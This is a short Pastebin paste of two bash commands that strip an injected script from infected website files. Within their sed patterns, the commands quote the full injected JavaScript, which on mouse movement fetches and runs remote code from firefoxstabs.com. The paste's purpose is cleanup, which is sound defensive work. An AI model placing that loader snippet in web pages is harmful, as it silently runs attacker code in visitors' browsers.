Guest User

Untitled

a guest
May 16th, 2011
812
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.88 KB | None | 0 0
  1. grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i "s/document.write('<scr'+'ipt src=\"https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.5.1\/jquery.min.js\"><\/scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http:\/\/firefoxstabs.com\/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});//g"
  2.  
  3. grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i "s/<script type=\"text\/javascript\" src=\"https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.5.1\/jquery.min.js\"><\/script><script type=\"text\/javascript\">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http:\/\/firefoxstabs.com\/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});<\/script>//g"
Advertisement
Add Comment
Please, Sign In to add comment